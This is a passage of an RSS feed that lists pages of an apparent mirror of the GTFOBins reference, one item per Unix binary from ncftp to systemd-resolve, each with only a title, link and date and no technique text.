+0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/ncftp/</guid><description/></item><item><title>needrestart</title><link>https://bokkapig.pages.dev/refs/gtfobins/needrestart/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/needrestart/</guid><description/></item><item><title>neofetch</title><link>https://bokkapig.pages.dev/refs/gtfobins/neofetch/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/neofetch/</guid><description/></item><item><title>nft</title><link>https://bokkapig.pages.dev/refs/gtfobins/nft/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/nft/</guid><description/></item><item><title>nginx</title><link>https://bokkapig.pages.dev/refs/gtfobins/nginx/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/nginx/</guid><description/></item><item><title>nice</title><link>https://bokkapig.pages.dev/refs/gtfobins/nice/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/nice/</guid><description/></item><item><title>nl</title><link>https://bokkapig.pages.dev/refs/gtfobins/nl/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/nl/</guid><description/></item><item><title>nm</title><link>https://bokkapig.pages.dev/refs/gtfobins/nm/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/nm/</guid><description/></item><item><title>nmap</title><link>https://bokkapig.pages.dev/refs/gtfobins/nmap/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/nmap/</guid><description/></item><item><title>node</title><link>https://bokkapig.pages.dev/refs/gtfobins/node/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/node/</guid><description/></item><item><title>nohup</title><link>https://bokkapig.pages.dev/refs/gtfobins/nohup/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/nohup/</guid><description/></item><item><title>npm</title><link>https://bokkapig.pages.dev/refs/gtfobins/npm/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/npm/</guid><description/></item><item><title>nroff</title><link>https://bokkapig.pages.dev/refs/gtfobins/nroff/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/nroff/</guid><description/></item><item><title>nsenter</title><link>https://bokkapig.pages.dev/refs/gtfobins/nsenter/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/nsenter/</guid><description/></item><item><title>ntpdate</title><link>https://bokkapig.pages.dev/refs/gtfobins/ntpdate/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/ntpdate/</guid><description/></item><item><title>nvim</title><link>https://bokkapig.pages.dev/refs/gtfobins/nvim/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/nvim/</guid><description/></item><item><title>octave</title><link>https://bokkapig.pages.dev/refs/gtfobins/octave/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/octave/</guid><description/></item><item><title>od</title><link>https://bokkapig.pages.dev/refs/gtfobins/od/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/od/</guid><description/></item><item><title>opencode</title><link>https://bokkapig.pages.dev/refs/gtfobins/opencode/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/opencode/</guid><description/></item><item><title>openssl</title><link>https://bokkapig.pages.dev/refs/gtfobins/openssl/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/openssl/</guid><description/></item><item><title>openvpn</title><link>https://bokkapig.pages.dev/refs/gtfobins/openvpn/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/openvpn/</guid><description/></item><item><title>openvt</title><link>https://bokkapig.pages.dev/refs/gtfobins/openvt/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/openvt/</guid><description/></item><item><title>opkg</title><link>https://bokkapig.pages.dev/refs/gtfobins/opkg/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/opkg/</guid><description/></item><item><title>pandoc</title><link>https://bokkapig.pages.dev/refs/gtfobins/pandoc/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/pandoc/</guid><description/></item><item><title>passwd</title><link>https://bokkapig.pages.dev/refs/gtfobins/passwd/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/passwd/</guid><description/></item><item><title>paste</title><link>https://bokkapig.pages.dev/refs/gtfobins/paste/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/paste/</guid><description/></item><item><title>pax</title><link>https://bokkapig.pages.dev/refs/gtfobins/pax/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/pax/</guid><description/></item><item><title>pdb</title><link>https://bokkapig.pages.dev/refs/gtfobins/pdb/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/pdb/</guid><description/></item><item><title>pdflatex</title><link>https://bokkapig.pages.dev/refs/gtfobins/pdflatex/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/pdflatex/</guid><description/></item><item><title>pdftex</title><link>https://bokkapig.pages.dev/refs/gtfobins/pdftex/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/pdftex/</guid><description/></item><item><title>perf</title><link>https://bokkapig.pages.dev/refs/gtfobins/perf/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/perf/</guid><description/></item><item><title>perl</title><link>https://bokkapig.pages.dev/refs/gtfobins/perl/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/perl/</guid><description/></item><item><title>perlbug</title><link>https://bokkapig.pages.dev/refs/gtfobins/perlbug/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/perlbug/</guid><description/></item><item><title>pexec</title><link>https://bokkapig.pages.dev/refs/gtfobins/pexec/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/pexec/</guid><description/></item><item><title>pg</title><link>https://bokkapig.pages.dev/refs/gtfobins/pg/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/pg/</guid><description/></item><item><title>php</title><link>https://bokkapig.pages.dev/refs/gtfobins/php/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/php/</guid><description/></item><item><title>pic</title><link>https://bokkapig.pages.dev/refs/gtfobins/pic/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/pic/</guid><description/></item><item><title>pico</title><link>https://bokkapig.pages.dev/refs/gtfobins/pico/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/pico/</guid><description/></item><item><title>pidstat</title><link>https://bokkapig.pages.dev/refs/gtfobins/pidstat/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/pidstat/</guid><description/></item><item><title>pip</title><link>https://bokkapig.pages.dev/refs/gtfobins/pip/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/pip/</guid><description/></item><item><title>pipx</title><link>https://bokkapig.pages.dev/refs/gtfobins/pipx/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/pipx/</guid><description/></item><item><title>pkexec</title><link>https://bokkapig.pages.dev/refs/gtfobins/pkexec/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/pkexec/</guid><description/></item><item><title>pkg</title><link>https://bokkapig.pages.dev/refs/gtfobins/pkg/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/pkg/</guid><description/></item><item><title>plymouth</title><link>https://bokkapig.pages.dev/refs/gtfobins/plymouth/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/plymouth/</guid><description/></item><item><title>podman</title><link>https://bokkapig.pages.dev/refs/gtfobins/podman/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/podman/</guid><description/></item><item><title>poetry</title><link>https://bokkapig.pages.dev/refs/gtfobins/poetry/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/poetry/</guid><description/></item><item><title>posh</title><link>https://bokkapig.pages.dev/refs/gtfobins/posh/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/posh/</guid><description/></item><item><title>pr</title><link>https://bokkapig.pages.dev/refs/gtfobins/pr/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/pr/</guid><description/></item><item><title>procmail</title><link>https://bokkapig.pages.dev/refs/gtfobins/procmail/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/procmail/</guid><description/></item><item><title>pry</title><link>https://bokkapig.pages.dev/refs/gtfobins/pry/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/pry/</guid><description/></item><item><title>psftp</title><link>https://bokkapig.pages.dev/refs/gtfobins/psftp/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/psftp/</guid><description/></item><item><title>psql</title><link>https://bokkapig.pages.dev/refs/gtfobins/psql/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/psql/</guid><description/></item><item><title>ptx</title><link>https://bokkapig.pages.dev/refs/gtfobins/ptx/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/ptx/</guid><description/></item><item><title>puppet</title><link>https://bokkapig.pages.dev/refs/gtfobins/puppet/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/puppet/</guid><description/></item><item><title>pwsh</title><link>https://bokkapig.pages.dev/refs/gtfobins/pwsh/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/pwsh/</guid><description/></item><item><title>pygmentize</title><link>https://bokkapig.pages.dev/refs/gtfobins/pygmentize/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/pygmentize/</guid><description/></item><item><title>pyright</title><link>https://bokkapig.pages.dev/refs/gtfobins/pyright/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/pyright/</guid><description/></item><item><title>python</title><link>https://bokkapig.pages.dev/refs/gtfobins/python/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/python/</guid><description/></item><item><title>qpdf</title><link>https://bokkapig.pages.dev/refs/gtfobins/qpdf/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/qpdf/</guid><description/></item><item><title>R</title><link>https://bokkapig.pages.dev/refs/gtfobins/r/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/r/</guid><description/></item><item><title>rake</title><link>https://bokkapig.pages.dev/refs/gtfobins/rake/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/rake/</guid><description/></item><item><title>ranger</title><link>https://bokkapig.pages.dev/refs/gtfobins/ranger/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/ranger/</guid><description/></item><item><title>rc</title><link>https://bokkapig.pages.dev/refs/gtfobins/rc/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/rc/</guid><description/></item><item><title>readelf</title><link>https://bokkapig.pages.dev/refs/gtfobins/readelf/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/readelf/</guid><description/></item><item><title>red</title><link>https://bokkapig.pages.dev/refs/gtfobins/red/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/red/</guid><description/></item><item><title>redcarpet</title><link>https://bokkapig.pages.dev/refs/gtfobins/redcarpet/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/redcarpet/</guid><description/></item><item><title>redis</title><link>https://bokkapig.pages.dev/refs/gtfobins/redis/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/redis/</guid><description/></item><item><title>restic</title><link>https://bokkapig.pages.dev/refs/gtfobins/restic/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/restic/</guid><description/></item><item><title>rev</title><link>https://bokkapig.pages.dev/refs/gtfobins/rev/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/rev/</guid><description/></item><item><title>rlogin</title><link>https://bokkapig.pages.dev/refs/gtfobins/rlogin/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/rlogin/</guid><description/></item><item><title>rlwrap</title><link>https://bokkapig.pages.dev/refs/gtfobins/rlwrap/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/rlwrap/</guid><description/></item><item><title>rpm</title><link>https://bokkapig.pages.dev/refs/gtfobins/rpm/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/rpm/</guid><description/></item><item><title>rpmdb</title><link>https://bokkapig.pages.dev/refs/gtfobins/rpmdb/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/rpmdb/</guid><description/></item><item><title>rpmquery</title><link>https://bokkapig.pages.dev/refs/gtfobins/rpmquery/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/rpmquery/</guid><description/></item><item><title>rpmverify</title><link>https://bokkapig.pages.dev/refs/gtfobins/rpmverify/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/rpmverify/</guid><description/></item><item><title>rsync</title><link>https://bokkapig.pages.dev/refs/gtfobins/rsync/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/rsync/</guid><description/></item><item><title>rsyslogd</title><link>https://bokkapig.pages.dev/refs/gtfobins/rsyslogd/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/rsyslogd/</guid><description/></item><item><title>rtorrent</title><link>https://bokkapig.pages.dev/refs/gtfobins/rtorrent/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/rtorrent/</guid><description/></item><item><title>ruby</title><link>https://bokkapig.pages.dev/refs/gtfobins/ruby/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/ruby/</guid><description/></item><item><title>run-mailcap</title><link>https://bokkapig.pages.dev/refs/gtfobins/run-mailcap/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/run-mailcap/</guid><description/></item><item><title>run-parts</title><link>https://bokkapig.pages.dev/refs/gtfobins/run-parts/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/run-parts/</guid><description/></item><item><title>runscript</title><link>https://bokkapig.pages.dev/refs/gtfobins/runscript/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/runscript/</guid><description/></item><item><title>rustc</title><link>https://bokkapig.pages.dev/refs/gtfobins/rustc/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/rustc/</guid><description/></item><item><title>rustdoc</title><link>https://bokkapig.pages.dev/refs/gtfobins/rustdoc/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/rustdoc/</guid><description/></item><item><title>rustfmt</title><link>https://bokkapig.pages.dev/refs/gtfobins/rustfmt/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/rustfmt/</guid><description/></item><item><title>rustup</title><link>https://bokkapig.pages.dev/refs/gtfobins/rustup/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/rustup/</guid><description/></item><item><title>rview</title><link>https://bokkapig.pages.dev/refs/gtfobins/rview/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/rview/</guid><description/></item><item><title>rvim</title><link>https://bokkapig.pages.dev/refs/gtfobins/rvim/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/rvim/</guid><description/></item><item><title>sash</title><link>https://bokkapig.pages.dev/refs/gtfobins/sash/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/sash/</guid><description/></item><item><title>scanmem</title><link>https://bokkapig.pages.dev/refs/gtfobins/scanmem/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/scanmem/</guid><description/></item><item><title>scp</title><link>https://bokkapig.pages.dev/refs/gtfobins/scp/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/scp/</guid><description/></item><item><title>screen</title><link>https://bokkapig.pages.dev/refs/gtfobins/screen/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/screen/</guid><description/></item><item><title>script</title><link>https://bokkapig.pages.dev/refs/gtfobins/script/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/script/</guid><description/></item><item><title>scrot</title><link>https://bokkapig.pages.dev/refs/gtfobins/scrot/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/scrot/</guid><description/></item><item><title>sed</title><link>https://bokkapig.pages.dev/refs/gtfobins/sed/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/sed/</guid><description/></item><item><title>service</title><link>https://bokkapig.pages.dev/refs/gtfobins/service/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/service/</guid><description/></item><item><title>setarch</title><link>https://bokkapig.pages.dev/refs/gtfobins/setarch/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/setarch/</guid><description/></item><item><title>setcap</title><link>https://bokkapig.pages.dev/refs/gtfobins/setcap/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/setcap/</guid><description/></item><item><title>setfacl</title><link>https://bokkapig.pages.dev/refs/gtfobins/setfacl/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/setfacl/</guid><description/></item><item><title>setlock</title><link>https://bokkapig.pages.dev/refs/gtfobins/setlock/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/setlock/</guid><description/></item><item><title>sftp</title><link>https://bokkapig.pages.dev/refs/gtfobins/sftp/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/sftp/</guid><description/></item><item><title>sg</title><link>https://bokkapig.pages.dev/refs/gtfobins/sg/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/sg/</guid><description/></item><item><title>shred</title><link>https://bokkapig.pages.dev/refs/gtfobins/shred/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/shred/</guid><description/></item><item><title>shuf</title><link>https://bokkapig.pages.dev/refs/gtfobins/shuf/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/shuf/</guid><description/></item><item><title>slsh</title><link>https://bokkapig.pages.dev/refs/gtfobins/slsh/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/slsh/</guid><description/></item><item><title>smbclient</title><link>https://bokkapig.pages.dev/refs/gtfobins/smbclient/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/smbclient/</guid><description/></item><item><title>snap</title><link>https://bokkapig.pages.dev/refs/gtfobins/snap/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/snap/</guid><description/></item><item><title>socat</title><link>https://bokkapig.pages.dev/refs/gtfobins/socat/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/socat/</guid><description/></item><item><title>socket</title><link>https://bokkapig.pages.dev/refs/gtfobins/socket/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/socket/</guid><description/></item><item><title>soelim</title><link>https://bokkapig.pages.dev/refs/gtfobins/soelim/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/soelim/</guid><description/></item><item><title>softlimit</title><link>https://bokkapig.pages.dev/refs/gtfobins/softlimit/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/softlimit/</guid><description/></item><item><title>sort</title><link>https://bokkapig.pages.dev/refs/gtfobins/sort/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/sort/</guid><description/></item><item><title>split</title><link>https://bokkapig.pages.dev/refs/gtfobins/split/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/split/</guid><description/></item><item><title>sqlite3</title><link>https://bokkapig.pages.dev/refs/gtfobins/sqlite3/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/sqlite3/</guid><description/></item><item><title>sqlmap</title><link>https://bokkapig.pages.dev/refs/gtfobins/sqlmap/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/sqlmap/</guid><description/></item><item><title>ss</title><link>https://bokkapig.pages.dev/refs/gtfobins/ss/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/ss/</guid><description/></item><item><title>ssh</title><link>https://bokkapig.pages.dev/refs/gtfobins/ssh/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/ssh/</guid><description/></item><item><title>ssh-agent</title><link>https://bokkapig.pages.dev/refs/gtfobins/ssh-agent/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/ssh-agent/</guid><description/></item><item><title>ssh-copy-id</title><link>https://bokkapig.pages.dev/refs/gtfobins/ssh-copy-id/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/ssh-copy-id/</guid><description/></item><item><title>ssh-keygen</title><link>https://bokkapig.pages.dev/refs/gtfobins/ssh-keygen/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/ssh-keygen/</guid><description/></item><item><title>ssh-keyscan</title><link>https://bokkapig.pages.dev/refs/gtfobins/ssh-keyscan/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/ssh-keyscan/</guid><description/></item><item><title>sshfs</title><link>https://bokkapig.pages.dev/refs/gtfobins/sshfs/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/sshfs/</guid><description/></item><item><title>sshpass</title><link>https://bokkapig.pages.dev/refs/gtfobins/sshpass/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/sshpass/</guid><description/></item><item><title>sshuttle</title><link>https://bokkapig.pages.dev/refs/gtfobins/sshuttle/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/sshuttle/</guid><description/></item><item><title>start-stop-daemon</title><link>https://bokkapig.pages.dev/refs/gtfobins/start-stop-daemon/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/start-stop-daemon/</guid><description/></item><item><title>stdbuf</title><link>https://bokkapig.pages.dev/refs/gtfobins/stdbuf/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/stdbuf/</guid><description/></item><item><title>strace</title><link>https://bokkapig.pages.dev/refs/gtfobins/strace/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/strace/</guid><description/></item><item><title>strings</title><link>https://bokkapig.pages.dev/refs/gtfobins/strings/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/strings/</guid><description/></item><item><title>su</title><link>https://bokkapig.pages.dev/refs/gtfobins/su/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/su/</guid><description/></item><item><title>sudo</title><link>https://bokkapig.pages.dev/refs/gtfobins/sudo/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/sudo/</guid><description/></item><item><title>sysctl</title><link>https://bokkapig.pages.dev/refs/gtfobins/sysctl/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/sysctl/</guid><description/></item><item><title>systemctl</title><link>https://bokkapig.pages.dev/refs/gtfobins/systemctl/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/systemctl/</guid><description/></item><item><title>systemd-resolve</title><link>https://bokkapig.pages.dev/refs/gtfobins/systemd-resolve/</link><pubDate>Wed, 27 May 2026 14:01:45 